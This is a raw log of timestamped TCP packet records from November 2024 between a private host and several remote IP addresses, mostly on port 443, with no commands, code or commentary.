                                                                                                                              Nov 18, 2024 17:55:47.247473955 CET49680443192.168.2.1720.189.173.13
                                                                                                                              Nov 18, 2024 17:55:47.423096895 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.423389912 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.423433065 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.424640894 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.425055027 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.425195932 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.425244093 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.469346046 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.577603102 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.577656984 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.577738047 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.577776909 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.577912092 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.577951908 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.577975035 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.578011036 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.578110933 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.578471899 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.578528881 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.578596115 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.578613043 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.629363060 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.629383087 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.671536922 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.717819929 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.718028069 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.718096972 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.718112946 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.718208075 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.718282938 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.718290091 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.718811989 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.718877077 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.718883991 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.740530968 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.740597963 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.740606070 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.788355112 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.788362980 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.807961941 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.808029890 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.808038950 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.808553934 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.808613062 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.808621883 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.845041037 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.845139027 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.845154047 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.845165968 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.845210075 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.845447063 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.855811119 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.855873108 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.855880976 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.856200933 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.856421947 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.856429100 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.900362015 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.924104929 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.924484968 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.924549103 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.924561024 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.924652100 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.924725056 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.924731970 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.924843073 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.924902916 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.925075054 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:47.925091028 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.936539888 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:47.936635017 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.936736107 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:47.936935902 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:47.936970949 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.943548918 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:47.943624020 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.943825960 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:47.944020033 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:47.944053888 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.457487106 CET4968280192.168.2.17192.229.211.108
                                                                                                                              Nov 18, 2024 17:55:48.563154936 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.563466072 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.563500881 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.567027092 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.567121029 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.567466021 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.567534924 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.567611933 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.606551886 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.606806040 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.606852055 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.607913971 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.607990026 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.608253002 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.608323097 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.608383894 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.611347914 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.617470026 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.617533922 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.649360895 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.649385929 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.665339947 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.697360039 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.713627100 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.713771105 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.713850975 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.713891029 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.714129925 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.714190960 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.714206934 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.714298964 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.714364052 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.714378119 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.715039015 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.715096951 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.715111017 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.718411922 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.718534946 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.718549013 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.761369944 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.761646032 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.761791945 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.761820078 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.761843920 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.761890888 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.761914968 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.761929035 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.762587070 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.762610912 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.762633085 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.762636900 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.762670994 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.763101101 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.784580946 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.784632921 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.784974098 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.785001993 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.785010099 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.810882092 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.810955048 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.836720943 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.837132931 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.837156057 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.837189913 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.837225914 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.837275028 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.837641954 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.837686062 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.837729931 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.837739944 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.838776112 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.838803053 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.838826895 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.838838100 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.838886976 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.857372999 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.922873020 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.923307896 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.923345089 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.923372984 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.923408985 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.923458099 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.923702002 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.923757076 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.923806906 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.923820019 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.925149918 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.925177097 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.925208092 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.925215006 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.925241947 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.925278902 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.925332069 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.925388098 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.925437927 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.925476074 CET44349729104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.925498009 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.925529957 CET49729443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.929563046 CET49731443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.929640055 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:48.929718971 CET49731443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.929944992 CET49731443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:48.929974079 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.314610004 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.314698935 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.314740896 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.314771891 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.314809084 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.314845085 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.314914942 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.314914942 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.314914942 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.314940929 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.314970970 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.315025091 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.315673113 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.315715075 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.315746069 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.315793991 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.315812111 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.315843105 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.316649914 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.316698074 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.316745043 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.316762924 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.316795111 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.316823959 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.316883087 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.316999912 CET49728443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.317020893 CET44349728104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.605186939 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.605565071 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.605597973 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.605971098 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.606359959 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.606453896 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.606556892 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.651340008 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.750562906 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.750895023 CET49731443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.750920057 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.751262903 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.751787901 CET49731443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.751856089 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.751962900 CET49731443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.774868965 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.774912119 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.775047064 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.775079966 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.775374889 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.775530100 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.775548935 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.775672913 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.775716066 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.775723934 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.776536942 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.776607037 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.776621103 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.776628971 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.776671886 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.776678085 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.795336008 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.827421904 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.895828962 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.896169901 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.896305084 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.896343946 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.896667004 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.896706104 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.896728039 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.896738052 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.896783113 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.896790028 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.897830009 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.897861958 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.897887945 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.897897959 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.897944927 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.898437023 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.898530006 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.898592949 CET49731443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.899203062 CET49731443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.899230003 CET44349731104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.902087927 CET49732443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.902143002 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:49.902237892 CET49732443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.902487040 CET49732443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:49.902501106 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.029982090 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.030082941 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.030139923 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.030168056 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.030426025 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.030484915 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.030493021 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.031022072 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.031069994 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.031076908 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.031599045 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.031645060 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.031652927 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.032092094 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.032128096 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.032141924 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.032150030 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.032195091 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.032708883 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.082393885 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.152470112 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.152872086 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.152898073 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.152934074 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.152956009 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.152993917 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.153354883 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.153404951 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.153445005 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.153453112 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.154685974 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.154773951 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.154782057 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.194596052 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.330388069 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.330405951 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.330662966 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.330701113 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.330758095 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.331195116 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.331212997 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.331264973 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.331515074 CET44349730104.18.94.41192.168.2.17
